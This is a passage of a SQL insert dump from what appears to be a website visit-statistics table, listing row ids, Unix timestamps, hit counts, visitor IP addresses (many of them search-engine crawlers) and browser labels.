217850,3,3,0,0,'66.249.66.218','chrome'),(440696,1565218345,1,1,0,0,'8.29.198.26','other'),(440697,1565218630,1,1,0,0,'141.8.188.29','other'),(440698,1565218778,3,3,0,0,'66.249.66.220','chrome'),(440699,1565218798,1,1,0,0,'157.55.39.158','other'),(440700,1565218970,3,3,0,0,'66.249.66.218','chrome'),(440701,1565219095,2,2,0,0,'157.55.39.239','other'),(440702,1565219126,3,3,0,0,'66.249.66.222','chrome'),(440703,1565219418,2,2,0,0,'66.249.66.157','chrome'),(440704,1565219761,1,1,0,0,'207.46.13.168','other'),(440705,1565219791,1,1,0,0,'66.249.66.220','chrome'),(440706,1565220549,1,1,0,0,'45.81.0.84','chrome'),(440707,1565221114,2,2,0,0,'138.68.236.147','chrome'),(440708,1565221137,2,2,0,0,'66.249.66.222','chrome'),(440709,1565221482,2,2,0,0,'66.249.66.220','chrome'),(440710,1565222309,1,1,0,0,'66.249.66.218','chrome'),(440711,1565222727,1,1,0,0,'193.106.30.99','chrome'),(440712,1565222973,1,1,0,0,'207.46.13.192','other'),(440713,1565223571,1,1,0,0,'66.249.66.218','chrome'),(440714,1565223999,1,1,0,0,'66.249.66.220','chrome'),(440715,1565224660,1,1,0,0,'66.249.66.218','chrome'),(440716,1565224885,2,2,0,0,'66.249.66.222','chrome'),(440717,1565225884,1,1,0,0,'66.249.66.220','chrome'),(440718,1565226432,1,1,0,0,'8.29.198.26','other'),(440719,1565226470,1,1,0,0,'66.249.66.158','chrome'),(440720,1565227316,1,1,0,0,'157.55.39.158','other'),(440721,1565227514,1,1,0,0,'66.249.66.222','chrome'),(440722,1565228695,2,2,0,0,'66.249.66.222','chrome'),(440723,1565228839,2,2,0,0,'141.8.188.29','other'),(440724,1565229182,1,1,0,0,'8.29.198.27','other'),(440725,1565229344,1,1,0,0,'66.249.66.218','chrome'),(440726,1565229951,1,1,0,0,'207.46.13.54','other'),(440727,1565230273,3,3,0,0,'66.249.66.222','chrome'),(440728,1565230276,4,4,0,0,'66.249.66.220','chrome'),(440729,1565230286,2,2,0,0,'66.249.66.158','chrome'),(440730,1565231351,1,1,0,0,'93.170.4.7','chrome'),(440731,1565232250,2,2,0,0,'66.249.66.222','chrome'),(440732,1565232296,2,2,0,0,'66.249.66.158','chrome'),(440733,1565232796,1,1,0,0,'40.77.167.27','other'),(440734,1565233484,2,2,0,0,'66.249.66.220','chrome'),(440735,1565233529,1,1,0,0,'207.46.13.192','other'),(440736,1565233820,1,1,0,0,'141.8.188.29','other'),(440737,1565233860,1,1,0,0,'66.249.66.218','chrome'),(440738,1565234051,1,1,0,0,'66.249.66.157','chrome'),(440739,1565234193,1,1,0,0,'66.249.66.159','chrome'),(440740,1565234594,1,1,0,0,'66.249.66.158','chrome'),(440741,1565235096,1,1,0,0,'66.249.66.220','chrome'),(440742,1565235422,1,1,0,0,'157.55.39.158','other'),(440743,1565235510,3,3,0,0,'66.249.66.218','chrome'),(440744,1565235707,1,1,0,0,'40.77.167.51','other'),(440745,1565235786,1,1,0,0,'66.249.66.157','chrome'),(440746,1565235853,1,1,0,0,'66.249.66.222','chrome'),(440747,1565236730,5,5,0,0,'66.249.66.218','chrome'),(440748,1565237084,1,1,0,0,'191.101.82.50','chrome'),(440749,1565237167,2,2,0,0,'141.8.188.29','other'),(440750,1565237255,1,1,0,0,'66.249.66.222','chrome'),(440751,1565237279,1,1,0,0,'8.29.198.25','other'),(440752,1565237571,1,1,0,0,'40.77.167.142','other'),(440753,1565237902,1,1,0,0,'191.101.215.190','other'),(440754,1565238050,1,1,0,0,'40.77.167.218','other'),(440755,1565239536,1,1,0,0,'46.211.54.66','chrome'),(440756,1565239539,1,1,0,0,'91.196.178.129','firefox'),(440757,1565239579,1,1,0,0,'141.8.188.29','other'),(440758,1565239691,1,1,0,0,'128.72.159.196','msie'),(440759,1565240015,1,1,0,0,'8.29.198.25','other'),(440760,1565240449,1,1,0,0,'157.55.39.231','other'),(440761,1565241938,95,95,0,0,'185.6.9.204','other'),(440762,1565242221,1,1,0,0,'40.77.167.218','other'),(440763,1565242306,1,1,0,0,'40.77.167.142','other'),(440764,1565242493,1,1,0,0,'89.208.86.238','chrome'),(440765,1565242839,90,90,0,0,'185.6.9.204','other'),(440766,1565243433,1,1,0,0,'141.8.188.29','other'),(440767,1565243464,1,1,0,0,'40.77.167.68','other'),(440768,1565243497,1,1,0,0,'91.236.184.20','chrome'),(440769,1565243761,77,77,0,0,'185.6.9.204','other'),(440770,1565243962,1,1,0,0,'78.109.23.2','other'),(440771,1565244587,1,1,0,0,'157.55.39.231','other'),(440772,1565244662,88,88,0,0,'185.6.9.204','other'),(440773,1565244679,1,1,0,0,'91.196.178.178','chrome'),(440774,1565245067,1,1,0,0,'40.77.167.39','other'),(440775,1565245563,80,80,0,0,'185.6.9.204','other'),(440776,1565245911,2,2,0,0,'40.77.167.53','other'),(440777,1565246375,1,1,0,0,'5.45.207.79','other'),(440778,1565246465,69,69,0,0,'185.6.9.204','other'),(440779,1565246780,2,2,0,0,'40.77.167.142','other'),(440780,1565246835,3,3,0,0,'40.77.167.68','other'),(440781,1565247394,69,69,0,0,'185.6.9.204','other'),(440782,1565248121,1,1,0,0,'8.29.198.27','other'),(440783,1565248295,64,64,0,0,'185.6.9.204','other'),(440784,1565249223,66,66,0,0,'185.6.9.204','other'),(440785,1565250125,60,60,0,0,'185.6.9.204','other'),(440786,1565250418,1,1,0,0,'180.76.15.17','other'),(440787,1565250853,1,1,0,0,'8.29.198.26','other'),(440788,1565250987,3,3,0,0,'40.77.167.53','other'),(440789,1565251053,68,68,0,0,'185.6.9.204','other'),(440790,1565251124,1,1,0,0,'157.55.39.231','other'),(440791,1565251957,64,64,0,0,'185.6.9.204','other'),(440792,1565252033,1,1,0,0,'40.77.167.136','other'),(440793,1565252883,13,13,0,0,'185.6.9.204','other'),(440794,1565255419,1,1,0,0,'157.55.39.231','other'),(440795,1565256419,1,1,0,0,'141.8.142.144','other'),(440796,1565256529,1,1,0,0,'40.77.167.136','other'),(440797,1565257061,1,1,0,0,'40.77.167.62','other'),(440798,1565258724,2,2,0,0,'66.249.66.222','chrome'),(440799,1565258810,1,1,0,0,'207.46.13.146','other'),(440800,1565258963,1,1,0,0,'8.29.198.26','other'),(440801,1565259630,1,1,0,0,'180.76.15.20','other'),(440802,1565259948,1,1,0,0,'46.211.73.114','chrome'),(440803,1565260070,1,1,0,0,'109.74.154.72','chrome'),(440804,1565261221,1,1,0,0,'40.77.167.121','other'),(440805,1565261694,1,1,0,0,'8.29.198.25','other'),(440806,1565265315,1,1,0,0,'40.77.167.63','other'),(440807,1565266435,1,1,0,0,'91.196.178.90','chrome'),(440808,1565267089,1,1,0,0,'40.77.167.62','other'),(440809,1565267751,2,2,0,0,'40.77.167.63','other'),(440810,1565268521,1,1,0,0,'157.55.39.160','other'),(440811,1565269478,2,2,0,0,'40.77.167.63','other'),(440812,1565269809,1,1,0,0,'8.29.198.26','other'),(440813,1565270469,1,1,0,0,'128.74.247.158','msie'),(440814,1565270681,1,1,0,0,'157.55.39.240','other'),(440815,1565271221,1,1,0,0,'194.187.217.61','chrome'),(440816,1565271857,1,1,0,0,'95.132.43.186','chrome'),(440817,1565272540,1,1,0,0,'8.29.198.26','other'),(440818,1565272755,1,1,0,0,'141.8.142.65','other'),(440819,1565273087,1,1,0,0,'40.77.167.9','other'),(440820,1565273134,1,1,0,0,'176.113.170.104','firefox'),(440821,1565274803,1,1,0,0,'157.55.39.160','other'),(440822,1565275581,1,1,0,0,'40.77.167.104','other'),(440823,1565275791,1,1,0,0,'178.74.199.12','firefox'),(440824,1565276211,1,1,0,0,'157.55.39.80','other'),(440825,1565277166,1,1,0,0,'51.254.97.56','firefox'),(440826,1565278103,1,1,0,0,'141.8.142.144','other'),(440827,1565278611,1,1,0,0,'40.77.167.104','other'),(440828,1565278860,1,1,0,0,'157.55.39.160','other'),(440829,1565280642,1,1,0,0,'8.29.198.26','other'),(440830,1565280739,1,1,0,0,'157.55.39.80','other'),(440831,1565282373,1,1,0,0,'141.101.134.52','chrome'),(440832,1565282911,1,1,0,0,'13.66.139.0','other'),(440833,1565283380,1,1,0,0,'8.29.198.27','other'),(440834,1565283592,1,1,0,0,'157.55.39.240','other'),(440835,1565285300,1,1,0,0,'141.8.188.11','other'),(440836,1565286126,1,1,0,0,'40.77.167.104','other'),(440837,1565286801,1,1,0,0,'207.46.13.84','other'),(440838,1565288036,1,1,0,0,'207.46.13.84','other'),(440839,1565288810,1,1,0,0,'91.196.178.133','chrome'),(440840,1565288842,1,1,0,0,'141.8.188.29','other'),(440841,1565289059,1,1,0,0,'5.45.207.79','other'),(440842,1565289299,2,2,0,0,'40.77.167.149','other'),(440843,1565290323,1,1,0,0,'40.77.167.149','other'),(440844,1565290514,1,1,0,0,'157.55.39.240','other'),(440845,1565291507,1,1,0,0,'8.29.198.26','other'),(440846,1565292313,1,1,0,0,'157.55.39.80','other'),(440847,1565292388,1,1,0,0,'66.249.66.157','chrome'),(440848,1565293929,1,1,0,0,'146.120.100.16','chrome'),(440849,1565294218,1,1,0,0,'8.29.198.25','other'),(440850,1565295616,1,1,0,0,'157.55.39.209','other'),(440851,1565296094,1,1,0,0,'207.46.13.84','other'),(440852,1565296426,1,1,0,0,'40.77.167.110','other'),(440853,1565297416,1,1,0,0,'157.55.39.80','other'),(440854,1565297593,1,1,0,0,'66.249.66.218','chrome'),(440855,1565298225,1,1,0,0,'157.55.39.209','other'),(440856,1565298864,1,1,0,0,'5.3.185.182','msie'),(440857,1565298915,1,1,0,0,'66.249.66.220','chrome'),(440858,1565299062,1,1,0,0,'40.77.167.110','other'),(440859,1565299090,1,1,0,0,'95.108.181.54','other'),(440860,1565299091,1,1,0,0,'178.154.171.24','other'),(440861,1565299713,1,1,0,0,'207.46.13.84','other'),(440862,1565300653,1,1,0,0,'141.8.188.29','other'),(440863,1565301876,1,1,0,0,'207.46.13.84','other'),(440864,1565302367,1,1,0,0,'8.29.198.25','other'),(440865,1565302613,1,1,0,0,'93.159.230.28','chrome'),(440866,1565303534,1,1,0,0,'66.249.66.220','chrome'),(440867,1565304606,1,1,0,0,'157.55.39.209','other'),(440868,1565305058,1,1,0,0,'8.29.198.26','other'),(440869,1565306267,2,2,0,0,'207.46.13.155','other'),(440870,1565306648,1,1,0,0,'157.55.39.80','other'),(440871,1565307647,1,1,0,0,'207.46.13.84','other'),(440872,1565307792,1,1,0,0,'157.55.39.209','other'),(440873,1565309016,1,1,0,0,'13.66.139.0','other'),(440874,1565309383,1,1,0,0,'180.76.15.26','other'),(440875,1565309960,1,1,0,0,'40.77.167.67','other'),(440876,1565310521,1,1,0,0,'5.45.207.19','other'),(440877,1565310872,1,1,0,0,'141.8.188.11','other'),(440878,1565311192,1,1,0,0,'40.77.167.40','other'),(440879,1565312522,1,1,0,0,'157.55.39.209','other'),(440880,1565313231,1,1,0,0,'8.29.198.25','other'),(440881,1565314925,1,1,0,0,'193.148.19.167','chrome'),(440882,1565315889,1,1,0,0,'8.29.198.25','other'),(440883,1565316049,1,1,0,0,'157.55.39.64','other'),(440884,1565316141,1,1,0,0,'66.249.66.218','chrome'),(440885,1565316645,1,1,0,0,'40.77.167.40','other'),(440886,1565318131,1,1,0,0,'40.77.167.31','other'),(440887,1565318215,1,1,0,0,'66.249.137.73','other'),(440888,1565318849,1,1,0,0,'207.46.13.119','other'),(440889,1565318858,1,1,0,0,'141.8.188.29','other'),(440890,1565320122,1,1,0,0,'157.55.39.67','other'),(440891,1565320653,1,1,0,0,'66.249.66.218','chrome'),(440892,1565322159,1,1,0,0,'207.46.13.51','other'),(440893,1565322599,2,2,0,0,'157.55.39.93','other'),(440894,1565323660,1,1,0,0,'141.8.188.29','other'),(440895,1565324080,1,1,0,0,'8.29.198.27','other'),(440896,1565326062,1,1,0,0,'207.46.13.51','other'),(440897,1565326503,1,1,0,0,'157.55.39.106','other'),(440898,1565326716,1,1,0,0,'8.29.198.26','other'),(440899,1565328270,1,1,0,0,'195.154.179.3','other'),(440900,1565328271,1,1,0,0,'141.8.188.29','other'),(440901,1565328512,1,1,0,0,'209.17.97.106','other'),(440902,1565329611,1,1,0,0,'5.45.207.19','other'),(440903,1565330461,1,1,0,0,'91.196.178.44','chrome'),(440904,1565330524,1,1,0,0,'213.231.24.95','chrome'),(440905,1565330648,1,1,0,0,'193.106.30.99','chrome'),(440906,1565332310,1,1,0,0,'157.55.39.106','other'),(440907,1565333181,1,1,0,0,'91.124.47.199','chrome'),(440908,1565333862,1,1,0,0,'178.154.171.27','other'),(440909,1565334755,1,1,0,0,'157.55.39.218','other'),(440910,1565334936,1,1,0,0,'8.29.198.26','other'),(440911,1565335405,2,2,0,0,'157.55.39.106','other'),(440912,1565335411,2,2,0,0,'207.46.13.62','other'),(440913,1565335444,2,2,0,0,'207.46.13.51','other'),(440914,1565335718,1,1,0,0,'5.45.207.79','other'),(440915,1565336619,2,2,0,0,'141.8.188.29','other'),(440916,1565336830,1,1,0,0,'207.46.13.62','other'),(440917,1565337535,1,1,0,0,'8.29.198.25','other'),(440918,1565337794,2,2,0,0,'141.8.188.29','other'),(440919,1565338360,1,1,0,0,'157.55.39.106','other'),(440920,1565338415,1,1,0,0,'5.45.207.79','other'),(440921,1565338418,2,2,0,0,'207.46.13.62','other'),(440922,1565339281,1,1,0,0,'157.55.39.106','other'),(440923,1565339485,2,2,0,0,'141.8.188.29','other'),(440924,1565340879,1,1,0,0,'141.8.188.11','other'),(440925,1565340888,2,2,0,0,'141.8.188.29','other'),(440926,1565341049,1,1,0,0,'31.43.31.87','chrome'),(440927,1565341924,1,1,0,0,'66.249.66.159','chrome'),(440928,1565342057,1,1,0,0,'157.55.39.248','other'),(440929,1565342102,1,1,0,0,'91.196.178.186','chrome'),(440930,1565342168,1,1,0,0,'31.43.31.87','chrome'),(440931,1565343267,1,1,0,0,'66.249.66.222','chrome'),(440932,1565344236,2,2,0,0,'207.46.13.62','other'),(440933,1565344244,1,1,0,0,'157.55.39.248','other'),(440934,1565345320,1,1,0,0,'91.196.178.70','chrome'),(440935,1565345800,1,1,0,0,'8.29.198.26','other'),(440936,1565346071,1,1,0,0,'141.8.188.11','other'),(440937,1565346166,1,1,0,0,'109.74.154.72','chrome'),(440938,1565346549,1,1,0,0,'40.77.167.48','other'),(440939,1565347647,1,1,0,0,'142.11.252.248','chrome'),(440940,1565347692,1,1,0,0,'207.46.13.62','other'),(440941,1565348363,1,1,0,0,'8.29.198.26','other'),(440942,1565349677,1,1,0,0,'157.55.39.61','other'),(440943,1565350272,1,1,0,0,'91.196.178.71','firefox'),(440944,1565351279,1,1,0,0,'40.77.167.48','other'),(440945,1565351521,3,3,0,0,'207.46.13.66','other'),(440946,1565353056,1,1,0,0,'207.46.13.113','other'),(440947,1565355614,1,1,0,0,'141.8.188.29','other'),(440948,1565356673,1,1,0,0,'8.29.198.25','other'),(440949,1565356971,1,1,0,0,'40.77.167.128','other'),(440950,1565357416,1,1,0,0,'178.255.176.66','firefox'),(440951,1565357892,1,1,0,0,'141.8.188.11','other'),(440952,1565358065,5,5,0,0,'207.46.13.66','other'),(440953,1565358084,1,1,0,0,'157.55.39.150','other'),(440954,1565359194,1,1,0,0,'8.29.198.27','other'),(440955,1565359893,1,1,0,0,'40.77.167.63','other'),(440956,1565359985,1,1,0,0,'5.45.207.79','other'),(440957,1565360690,1,1,0,0,'193.106.30.99','chrome'),(440958,1565361070,1,1,0,0,'91.196.178.182','chrome'),(440959,1565362253,1,1,0,0,'91.196.178.132','firefox'),(440960,1565362584,1,1,0,0,'40.77.167.63','other'),(440961,1565363351,1,1,0,0,'141.8.188.29','other'),(440962,1565363621,1,1,0,0,'180.76.15.145','other'),(440963,1565364055,1,1,0,0,'40.77.167.63','other'),(440964,1565365396,1,1,0,0,'141.8.188.29','other'),(440965,1565365580,2,2,0,0,'40.77.167.63','other'),(440966,1565366982,1,1,0,0,'207.46.13.66','other'),(440967,1565367118,1,1,0,0,'157.55.39.167','other'),(440968,1565367535,1,1,0,0,'8.29.198.25','other'),(440969,1565369252,1,1,0,0,'46.211.134.103','chrome'),(440970,1565369599,1,1,0,0,'60.191.38.77','firefox'),(440971,1565370032,1,1,0,0,'8.29.198.27','other'),(440972,1565370272,1,1,0,0,'66.249.66.218','chrome'),(440973,1565370646,1,1,0,0,'207.46.13.119','other'),(440974,1565371110,1,1,0,0,'207.46.13.66','other'),(440975,1565371827,1,1,0,0,'141.8.188.29','other'),(440976,1565373287,1,1,0,0,'157.55.39.167','other'),(440977,1565374464,1,1,0,0,'207.46.13.66','other'),(440978,1565375279,1,1,0,0,'207.46.13.119','other'),(440979,1565375568,1,1,0,0,'60.191.38.77','firefox'),(440980,1565375730,1,1,0,0,'157.55.39.144','other'),(440981,1565376192,2,2,0,0,'157.55.39.167','other'),(440982,1565377555,1,1,0,0,'207.46.13.119','other'),(440983,1565378121,2,2,0,0,'157.55.39.144','other'),(440984,1565378391,1,1,0,0,'8.29.198.25','other'),(440985,1565378711,1,1,0,0,'157.55.39.65','other'),(440986,1565379893,1,1,0,0,'157.55.39.144','other'),(440987,1565380605,1,0,1,0,'66.249.66.220',''),(440988,1565380858,1,1,0,0,'8.29.198.25','other'),(440989,1565381344,1,1,0,0,'40.77.167.62','other'),(440990,1565381651,1,1,0,0,'157.55.39.144','other'),(440991,1565382374,1,1,0,0,'66.249.66.218','chrome'),(440992,1565385053,1,1,0,0,'157.55.39.144','other'),(440993,1565385357,1,1,0,0,'40.77.167.62','other'),(440994,1565386281,1,1,0,0,'157.55.39.159','other'),(440995,1565387284,1,1,0,0,'157.55.39.159','other'),(440996,1565388047,2,2,0,0,'157.55.39.65','other'),(440997,1565389258,1,1,0,0,'8.29.198.26','other'),(440998,1565389459,1,1,0,0,'141.8.188.29','other'),(440999,1565391681,1,1,0,0,'8.29.198.26','other'),(441000,1565391918,1,1,0,0,'66.249.66.220','chrome'),(441001,1565392045,1,1,0,0,'157.55.39.144','other'),(441002,1565394909,2,2,0,0,'207.46.13.43','other'),(441003,1565396356,1,1,0,0,'157.55.39.215','other'),(441004,1565396701,1,1,0,0,'157.55.39.64','other'),(441005,1565396882,2,2,0,0,'66.249.66.218','chrome'),(441006,1565398352,1,1,0,0,'157.55.39.64','other'),(441007,1565398540,1,1,0,0,'207.46.13.45','other'),(441008,1565398631,1,1,0,0,'181.214.186.39','other'),(441009,1565398724,1,0,1,0,'66.249.66.132',''),(441010,1565399563,1,1,0,0,'195.128.17.206','other'),(441011,1565399794,1,1,0,0,'207.46.13.45','other'),(441012,1565400113,1,1,0,0,'8.29.198.26','other'),(441013,1565400351,1,1,0,0,'66.249.66.128','chrome'),(441014,1565400457,1,1,0,0,'40.77.167.20','other'),(441015,1565400847,2,2,0,0,'157.55.39.64','other'),(441016,1565400965,2,2,0,0,'66.249.66.222','chrome'),(441017,1565401270,1,1,0,0,'141.8.188.29','other'),(441018,1565401586,1,1,0,0,'40.77.167.20','other'),(441019,1565402515,1,1,0,0,'8.29.198.27','other'),(441020,1565402572,1,1,0,0,'66.249.66.130','chrome'),(441021,1565403125,1,1,0,0,'207.46.13.43','other'),(441022,1565403336,1,1,0,0,'66.249.66.218','chrome'),(441023,1565404157,1,1,0,0,'207.46.13.43','other'),(441024,1565404318,1,1,0,0,'158.69.225.37','other'),(441025,1565404352,1,1,0,0,'158.69.225.37','chrome'),(441026,1565404487,1,1,0,0,'51.77.246.67','other'),(441027,1565404994,1,1,0,0,'40.77.167.20','other'),(441028,1565405551,1,1,0,0,'207.46.13.43','other'),(441029,1565405917,1,1,0,0,'66.249.66.220','chrome'),(441030,1565406071,3,3,0,0,'66.249.66.218','chrome'),(441031,1565406230,1,1,0,0,'66.249.66.222','chrome'),(441032,1565406592,1,1,0,0,'13.66.139.0','other'),(441033,1565407000,1,1,0,0,'207.46.13.43','other'),(441034,1565407253,1,1,0,0,'66.249.66.218','chrome'),(441035,1565407355,1,1,0,0,'141.8.188.29','other'),(441036,1565407378,2,2,0,0,'66.249.66.222','chrome'),(441037,1565408896,1,1,0,0,'66.249.66.132','chrome'),(441038,1565409180,1,1,0,0,'66.249.66.218','chrome'),(441039,1565409469,1,1,0,0,'199.16.157.183','other'),(441040,1565409762,1,1,0,0,'87.250.224.65','other'),(441041,1565409911,1,1,0,0,'66.249.66.132','chrome'),(441042,1565410042,1,1,0,0,'141.8.188.11','other'),(441043,1565410043,1,1,0,0,'40.77.167.22','other'),(441044,1565410204,2,2,0,0,'66.249.66.220','chrome'),(441045,1565410447,1,1,0,0,'46.211.47.220','chrome'),(441046,1565410455,2,2,0,0,'66.249.66.222','chrome'),(441047,1565410799,1,1,0,0,'66.249.66.130','chrome'),(441048,1565410968,1,1,0,0,'8.29.198.27','other'),(441049,1565411446,1,1,0,0,'207.46.13.43','other'),(441050,1565411634,1,1,0,0,'66.249.66.132','chrome'),(441051,1565411845,1,1,0,0,'40.77.167.217','other'),(441052,1565412251,1,1,0,0,'66.249.66.220','chrome'),(441053,1565412365,1,1,0,0,'66.249.66.222','chrome'),(441054,1565412441,1,1,0,0,'141.8.188.29','other'),(441055,1565412837,1,1,0,0,'66.249.66.130','chrome'),(441056,1565413057,1,1,0,0,'66.249.66.218','chrome'),(441057,1565413339,1,1,0,0,'8.29.198.25','other'),(441058,1565413430,1,1,0,0,'193.106.30.99','chrome'),(441059,1565413537,1,1,0,0,'66.249.66.220','chrome'),(441060,1565414154,1,1,0,0,'23.228.90.98','chrome'),(441061,1565414563,1,1,0,0,'66.249.66.220','chrome'),(441062,1565414790,1,1,0,0,'40.77.167.217','other'),(441063,1565414884,1,1,0,0,'40.77.167.22','other'),(441064,1565415918,1,1,0,0,'66.249.66.220','chrome'),(441065,1565415974,1,1,0,0,'40.77.167.217','other'),(441066,1565416001,2,2,0,0,'66.249.66.218','chrome'),(441067,1565416060,1,1,0,0,'51.15.53.83','other'),(441068,1565416084,1,1,0,0,'141.8.188.29','other'),(441069,1565416420,1,1,0,0,'87.250.224.64','other'),(441070,1565417068,2,2,0,0,'66.249.66.218','chrome'),(441071,1565417097,1,1,0,0,'66.249.66.132','chrome'),(441072,1565417935,1,1,0,0,'111.230.34.186','other'),(441073,1565418274,1,1,0,0,'207.46.13.198','other'),(441074,1565419064,2,2,0,0,'66.249.66.222','chrome'),(441075,1565419521,3,3,0,0,'207.46.13.56','other'),(441076,1565419725,1,1,0,0,'66.249.66.218','chrome'),(441077,1565420488,1,1,0,0,'66.249.66.222','chrome'),(441078,1565420841,1,1,0,0,'66.249.66.218','chrome'),(441079,1565421122,1,1,0,0,'5.255.253.38','other'),(441080,1565421520,2,2,0,0,'157.55.39.180','other'),(441081,1565421532,1,1,0,0,'66.249.66.222','chrome'),(441082,1565421661,1,1,0,0,'31.43.152.27','chrome'),(441083,1565421819,1,1,0,0,'8.29.198.27','other'),(441084,1565421968,2,2,0,0,'157.55.39.226','other'),(441085,1565422389,1,1,0,0,'109.87.171.186','chrome'),(441086,1565422547,2,2,0,0,'66.249.66.218','chrome'),(441087,1565423060,1,1,0,0,'66.249.66.130','chrome'),(441088,1565423639,1,1,0,0,'157.55.39.226','other'),(441089,1565423662,1,1,0,0,'66.249.66.222','chrome'),(441090,1565423685,2,2,0,0,'66.249.66.218','chrome'),(441091,1565424174,1,1,0,0,'8.29.198.27','other'),(441092,1565424194,2,2,0,0,'157.55.39.71','other'),(441093,1565424654,1,1,0,0,'157.55.39.180','other'),(441094,1565425277,1,1,0,0,'66.249.66.222','chrome'),(441095,1565425460,1,1,0,0,'66.249.66.218','chrome'),(441096,1565426002,1,1,0,0,'141.8.188.29','other'),(441097,1565426632,1,1,0,0,'157.55.39.71','other'),(441098,1565426971,1,1,0,0,'207.46.13.0','other'),(441099,1565427454,2,2,0,0,'66.249.66.220','chrome'),(441100,1565427641,2,2,0,0,'66.249.66.222','chrome'),(441101,1565427933,2,2,0,0,'66.249.66.218','chrome'),(441102,1565428289,1,1,0,0,'91.196.178.173','chrome'),(441103,1565428774,2,2,0,0,'66.249.66.222','chrome'),(441104,1565428905,1,1,0,0,'157.55.39.71','other'),(441105,1565429392,1,1,0,0,'66.249.66.220','chrome'),(441106,1565429939,1,1,0,0,'66.249.66.218','chrome'),(441107,1565430014,1,1,0,0,'157.55.39.180','other'),(441108,1565430020,1,1,0,0,'141.8.142.103','other'),(441109,1565430309,1,1,0,0,'37.9.113.103','other'),(441110,1565430419,2,2,0,0,'66.249.66.222','chrome'),(441111,1565431102,1,1,0,0,'109.74.154.72','chrome'),(441112,1565431195,1,1,0,0,'66.249.66.220','chrome'),(441113,1565431741,2,2,0,0,'66.249.66.222','chrome'),(441114,1565432084,1,1,0,0,'207.46.13.0','other'),(441115,1565432671,1,1,0,0,'8.29.198.26','other'),(441116,1565432741,1,1,0,0,'141.8.142.108','other'),(441117,1565433843,1,1,0,0,'66.249.66.132','chrome'),(441118,1565433954,1,1,0,0,'207.46.13.0','other'),(441119,1565433987,1,1,0,0,'66.249.66.218','chrome'),(441120,1565434069,1,1,0,0,'5.45.207.79','other'),(441121,1565434816,1,1,0,0,'13.66.139.0','other'),(441122,1565434969,1,1,0,0,'66.249.66.128','chrome'),(441123,1565435010,1,1,0,0,'8.29.198.27','other'),(441124,1565436020,1,1,0,0,'141.101.134.52','chrome'),(441125,1565437521,2,2,0,0,'207.46.13.0','other'),(441126,1565438363,1,1,0,0,'157.55.39.226','other'),(441127,1565438372,2,2,0,0,'157.55.39.71','other'),(441128,1565438420,3,3,0,0,'40.77.167.64','other'),(441129,1565438735,1,1,0,0,'157.55.39.180','other'),(441130,1565438813,2,2,0,0,'66.249.66.220','chrome'),(441131,1565438892,1,1,0,0,'213.180.203.23','other'),(441132,1565439991,1,1,0,0,'66.249.66.222','chrome'),(441133,1565440524,1,1,0,0,'40.77.167.93','other'),(441134,1565440722,1,1,0,0,'66.249.66.132','chrome'),(441135,1565441282,1,1,0,0,'157.55.39.71','other'),(441136,1565442502,1,1,0,0,'66.249.66.132','chrome'),(441137,1565442548,1,1,0,0,'157.55.39.71','other'),(441138,1565443416,1,1,0,0,'66.249.66.222','chrome'),(441139,1565443523,1,1,0,0,'8.29.198.25','other'),(441140,1565444243,1,1,0,0,'40.77.167.6','other'),(441141,1565444575,1,1,0,0,'66.249.66.132','chrome'),(441142,1565444729,1,1,0,0,'66.249.66.220','chrome'),(441143,1565445458,1,1,0,0,'66.249.66.128','chrome'),(441144,1565445767,1,1,0,0,'66.249.66.222','chrome'),(441145,1565445861,1,1,0,0,'8.29.198.25','other'),(441146,1565446034,1,1,0,0,'157.55.39.71','other'),(441147,1565446410,1,1,0,0,'40.77.167.93','other'),(441148,1565446604,1,1,0,0,'66.249.66.220','chrome'),(441149,1565446874,1,1,0,0,'66.249.66.218','chrome'),(441150,1565447511,1,1,0,0,'207.46.13.185','other'),(441151,1565447791,1,1,0,0,'141.8.188.29','other'),(441152,1565447823,5,5,0,0,'66.249.66.218','chrome'),(441153,1565448246,2,2,0,0,'66.249.66.128','chrome'),(441154,1565448852,2,2,0,0,'66.249.66.220','chrome'),(441155,1565448915,1,1,0,0,'66.249.66.130','chrome'),(441156,1565450149,1,1,0,0,'91.196.178.189','chrome'),(441157,1565450180,1,1,0,0,'91.196.178.189','firefox'),(441158,1565450775,5,5,0,0,'207.46.13.152','other'),(441159,1565451304,3,3,0,0,'157.55.39.8','other'),(441160,1565451411,1,1,0,0,'66.249.66.132','chrome'),(441161,1565451443,4,4,0,0,'66.249.66.220','chrome'),(441162,1565451853,2,2,0,0,'66.249.66.222','chrome'),(441163,1565451914,1,1,0,0,'66.249.66.128','chrome'),(441164,1565452588,1,1,0,0,'157.55.39.8','other'),(441165,1565453027,1,1,0,0,'207.46.13.152','other'),(441166,1565453107,300,300,0,0,'5.9.70.117','other'),(441167,1565453109,32,32,0,0,'95.216.19.59','other'),(441168,1565453454,27,27,0,0,'192.151.157.210','other'),(441169,1565453839,6,6,0,0,'66.249.66.218','chrome'),(441170,1565453890,2,2,0,0,'207.46.13.185','other'),(441171,1565453995,1,1,0,0,'87.250.224.64','other'),(441172,1565454025,1,1,0,0,'66.249.66.132','chrome'),(441173,1565454150,4,4,0,0,'66.249.66.220','chrome'),(441174,1565454368,1,1,0,0,'8.29.198.26','other'),(441175,1565454675,2,2,0,0,'40.77.167.44','other'),(441176,1565455473,1,1,0,0,'37.73.82.91','chrome'),(441177,1565455631,1,1,0,0,'91.209.11.236','other'),(441178,1565455959,2,2,0,0,'66.249.66.222','chrome'),(441179,1565455974,1,1,0,0,'66.249.66.128','chrome'),(441180,1565456126,1,1,0,0,'66.249.66.220','chrome'),(441181,1565456143,1,1,0,0,'141.8.188.29','other'),(441182,1565456255,1,1,0,0,'157.55.39.8','other'),(441183,1565456699,1,1,0,0,'8.29.198.27','other'),(441184,1565456803,59,59,0,0,'148.251.131.16','other'),(441185,1565457357,1,1,0,0,'207.46.13.185','other'),(441186,1565457444,1,1,0,0,'157.55.39.8','other'),(441187,1565457719,57,57,0,0,'148.251.131.16','other'),(441188,1565457759,2,2,0,0,'66.249.66.132','chrome'),(441189,1565457761,2,2,0,0,'66.249.66.220','chrome'),(441190,1565458054,2,2,0,0,'66.249.66.218','chrome'),(441191,1565459428,1,1,0,0,'130.105.68.70','other'),(441192,1565459985,5,5,0,0,'66.249.66.220','chrome'),(441193,1565460258,4,4,0,0,'66.249.66.218','chrome'),(441194,1565460270,1,1,0,0,'66.249.66.128','chrome'),(441195,1565460338,1,1,0,0,'66.249.66.132','chrome'),(441196,1565460552,4,4,0,0,'157.55.39.212','other'),(441197,1565460644,1,1,0,0,'95.108.181.83','other'),(441198,1565460685,1,1,0,0,'37.73.133.116','chrome'),(441199,1565461241,3,3,0,0,'66.249.66.220